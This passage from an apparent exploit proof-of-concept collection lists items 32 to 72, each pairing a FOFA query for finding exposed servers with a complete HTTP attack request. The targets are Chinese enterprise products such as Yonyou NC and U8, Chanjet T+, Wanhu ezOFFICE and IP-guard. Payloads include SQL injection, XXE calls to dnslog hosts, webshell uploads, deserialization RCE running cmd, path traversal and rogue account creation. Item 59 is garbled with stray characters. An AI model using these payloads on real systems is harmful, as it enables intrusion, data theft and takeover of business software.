Content-Type: application/x-www-form-urlencoded

32. 用友 (Yonyou) NC complainbilldetail SQL injection
Version: NC633, NC65
FOFA:app="用友-UFIDA-NC"
GET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

33. 用友 (Yonyou) NC downTax/download SQL injection
Version: NC6.5
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

34. 用友 (Yonyou) NC warningDetailInfo interface SQL injection
FOFA:app="用友-UFIDA-NC"
GET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

35. 用友 (Yonyou) NC-Cloud importhttpscer arbitrary file upload
FOFA:app="用友-NC-Cloud"
POST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1
Host: 203.25.218.166:8888
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
accessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA
Content-Length: 190
Content-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0

--fd28cb44e829ed1c197ec3bc71748df0
Content-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"

<%out.println(1111*1111);%>
--fd28cb44e829ed1c197ec3bc71748df0--

36. 用友 (Yonyou) NC-Cloud soapFormat XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/soapFormat.ajax HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
Content-Length: 263
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1

msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a

37. 用友 (Yonyou) NC-Cloud IUpdateService XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Content-Length: 421
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: text/xml;charset=UTF-8
SOAPAction: urn:getResult
Upgrade-Insecure-Requests: 1

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">
<soapenv:Header/>
<soapenv:Body>
<iup:getResult>
<!--type: string-->
<iup:string><![CDATA[
<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>
<xxx/>]]></iup:string>
</iup:getResult>
</soapenv:Body>
</soapenv:Envelope>

38. 用友 (Yonyou) U8 Cloud smartweb2.RPC.d XXE
FOFA:app="用友-U8-Cloud"
POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1
Host: 192.168.40.131:8088
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25
Content-Length: 260
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p></vps></rpc>

39. 用友 (Yonyou) U8 Cloud RegisterServlet SQL injection
FOFA:title="u8c"
POST /servlet/RegisterServlet HTTP/1.1
Host: 192.168.86.128:8089
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 85
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
X-Forwarded-For: 127.0.0.1
Accept-Encoding: gzip

usercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--

40. 用友 (Yonyou) U8-Cloud XChangeServlet XXE
FOFA:app="用友-U8-Cloud"
POST /service/XChangeServlet HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Content-Type: text/xml
Connection: close

<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a></r>

41. 用友 (Yonyou) U8 Cloud MeasureQueryByToolAction SQL injection
FOFA:app="用友-U8-Cloud"
GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json
Accept-Encoding: gzip
Connection: close

42. 用友 (Yonyou) GRP-U8 SmartUpload01 file upload
FOFA:app="用友-GRP-U8"
POST /u8qx/SmartUpload01.jsp HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36

PAYLOAD

http://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml

43. 用友 (Yonyou) GRP-U8 userInfoWeb SQL injection leading to RCE
FOFA:app="用友-GRP-U8"
POST /services/userInfoWeb HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
SOAPAction:
Content-Type: text/xml;charset=UTF-8

<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">
   <soapenv:Header/>
   <soapenv:Body>
      <ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
         <userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>
      </ser:getUserNameById>
   </soapenv:Body>
</soapenv:Envelope>

44. 用友 (Yonyou) GRP-U8 bx_dj_check.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

45. 用友 (Yonyou) GRP-U8 ufgovbank XXE
FOFA:app="用友-GRP-U8"
POST /ufgovbank HTTP/1.1
Host: 192.168.40.130:222
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Connection: close
Content-Length: 161
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

reqData=<?xml version="1.0"?>
<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest

46. 用友 (Yonyou) GRP-U8 sqcxIndex.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

47. 用友 (Yonyou) GRP A++Cloud government finance cloud arbitrary file read
FOFA:body="/pf/portal/login/css/fonts/style.css"
GET /ma/emp/maEmp/download?fileName=../../../etc/passwd HTTP/1.1
Host: x.x.x.x
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
If-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT
Connection: close

48. 用友 (Yonyou) U8 CRM swfupload arbitrary file upload
FOFA:title="用友U8CRM"
POST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data;boundary=----269520967239406871642430066855

------269520967239406871642430066855
Content-Disposition: form-data; name="file"; filename="s.php"
Content-Type: application/octet-stream

1231
------269520967239406871642430066855
Content-Disposition: form-data; name="upload"

upload
------269520967239406871642430066855--

49. 用友 (Yonyou) U8 CRM uploadfile.php interface arbitrary file upload
FOFA:body="用友U8CRM"

POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Content-Length: 329
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w

-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="file"; filename="%s.php "
Content-Type: application/octet-stream

wersqqmlumloqa
-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="upload"

upload
-----------------------------vvv3wdayqv3yppdxvn3w--

http://x.x.x.x/tmpfile/updB3CB.tmp.php

50. QDocs Smart School 6.4.1 filterRecords SQL injection
FOFA:body="close closebtnmodal"
POST /course/filterRecords/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 224
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

searchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1

51. 云时空 Socialized Commerce ERP System validateLoginName SQL injection
FOFA:app="云时空社会化商业ERP系统"
GET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

52. 泛微 (Weaver) E-Office json_common.php SQL injection
FOFA:app="泛微-EOffice"
POST /building/json_common.php HTTP/1.1
Host: 192.168.86.128:8097
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Content-Length: 87
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

tfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333

53. 迪普 DPtech VPN Service arbitrary file upload
FOFA:app="DPtech-SSLVPN"
/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

54. 畅捷通 (Chanjet) T+ getstorewarehousebystore remote code execution
FOFA:app="畅捷通-TPlus"
Step 1: send the request below to the target; the command it runs writes the given string into the given file
"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"

Full request
POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F
Content-Length: 593

{
"storeID":{
"__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
"MethodName":"Start",
  "ObjectInstance":{
   "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
    "StartInfo":{
   "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
    "FileName":"cmd",
    "Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
    }
  }
  }
}

Step 2: request the following URL
/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt

55. 畅捷通 (Chanjet) T+ getdecallusers information disclosure
FOFA:app="畅捷通-TPlus"
Step 1: obtain a Cookie through the interface
/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword
Step 2: using the obtained Cookie, request
/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers

56. 畅捷通 (Chanjet) T+ RRATableController,Ufida.T.DI.UIP.ashx deserialization RCE
FOFA: app="畅捷通-TPlus"
POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Type: application/json

{
  "storeID":{
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
   "MethodName":"Start",
    "ObjectInstance":{
       "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
        "StartInfo": {
           "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
           "FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"
       }
    }
  }
}

57. 畅捷通 (Chanjet) T+ keyEdit.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

58. 畅捷通 (Chanjet) T+ KeyInfoList.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

" \$ c/ ?0 n! ?# ^" I& Y59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行9 [* \8 _, X7 {- v" r4 l
FOFA: title="@XETUX" && title="XPOS" && body="BackEnd". _$ ~/ A. M# c! I, _
POST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1. ^8 u: w; F' `/ }8 m9 R
Host: 192.168.86.128:9090, L7 R2 J7 f# v, I/ }  A0 m
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
& [/ E8 R- J5 m% T/ X4 b; j  pConnection: close8 U9 N: @* o. N% Z
Content-Length: 16697 G0 F( _. v& r) W0 {
Accept: */*+ q7 i* Q' n! M* t! J1 R7 g5 B
Accept-Language: en
  }9 ?; e5 L5 b1 kContent-Type: application/x-www-form-urlencoded
# L  |% t. I* l9 W& sAccept-Encoding: gzip: t6 e  c/ _! ?# D# H1 s/ S- Q, A

0 o( `. s* v  r; v- V9 rPAYLOAD
$ D% F5 d$ k( {! {, e& Y9 V8 @' O0 E( t/ W  ]9 ^3 ^

60. 百卓 Smart management platform importexport.php SQL injection
FOFA:title="Smart管理平台"
GET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

61. 浙大恩特 customer resource management system fileupload arbitrary file upload
FOFA: title="欢迎使用浙大恩特客户资源管理系统"
POST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 27
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

8uxssX66eqrqtKObcVa0kid98xa

62. IP-guard WebServer remote command execution
FOFA:"IP-guard" && icon_hash="2030860561"
GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

Then request:

GET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x

63. IP-guard WebServer arbitrary file read
IP-guard < 4.82.0609.0
FOFA:icon_hash="2030860561"
POST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A

64. 捷诚 management information system CWSFinanceCommon SQL injection
FOFA:body="/Scripts/EnjoyMsg.js"
POST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1
Host: 192.168.86.128:9001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Connection: close
Content-Length: 369
Accept: */*
Accept-Language: en
Content-Type: text/xml; charset=utf-8
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <GetOSpById xmlns="http://tempuri.org/">
      <sId>1';waitfor delay '0:0:5'--+</sId>
    </GetOSpById>
  </soap:Body>
</soap:Envelope>

65. 优卡特脸爱云一脸通智慧管理平台 (face-recognition smart management platform) 1.0.55.0.0.1 authorization bypass
FOFA:title="欢迎使用脸爱云 一脸通智慧管理平台"
A 200 response means the account test123456/123456 has been created.
POST /SystemMng.ashx HTTP/1.1
Host:
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Accept-Language: en
Content-Length: 174

operatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators

66. 万户ezOFFICE collaborative management platform SendFileCheckTemplateEdit SQL injection
FOFA:app="万户ezOFFICE协同管理平台"

GET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

If lines 42 and 43 of the response contain the string 6cfe798ba8e5b85feb50164c59f4bec9, the vulnerability is confirmed.

67. 万户ezOFFICE wpsservlet arbitrary file upload
FOFA:app="万户网络-ezOFFICE"
The newdocId and filename parameters set the name of the written file, dir sets the directory it is written to, and fileType sets the file extension.
POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Content-Length: 173
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Connection: close
Content-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp
DNT: 1
Upgrade-Insecure-Requests: 1

--ufuadpxathqvxfqnuyuqaozvseiueerp
Content-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"

<% out.print("sasdfghjkj");%>
--ufuadpxathqvxfqnuyuqaozvseiueerp--

The uploaded file is served at /defaultroot/platform/portal/layout/apoxkq.jsp

68. 万户ezOFFICE wf_printnum.jsp SQL injection
FOFA:app="万户ezOFFICE协同管理平台"
GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: {{host}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

69. 万户 ezOFFICE contract_gd.jsp SQL injection
FOFA:app="万户ezOFFICE协同管理平台"
GET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

70. 万户ezEIP success command execution
FOFA:app="万户网络-ezEIP"
POST /member/success.aspx HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
SID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=
Content-Type: application/x-www-form-urlencoded
TYPE: C
Content-Length: 16702

__VIEWSTATE=PAYLOAD

71. 邦永PM2 project management system Global_UserLogin.aspx SQL injection
FOFA:body="PM2项目管理系统BS版增强工具.zip"
GET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Connection: close
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Upgrade-Insecure-Requests: 1

72. 致远OA (Seeyon OA) getAjaxDataServlet XXE
FOFA:app="致远互联-OA"
POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1
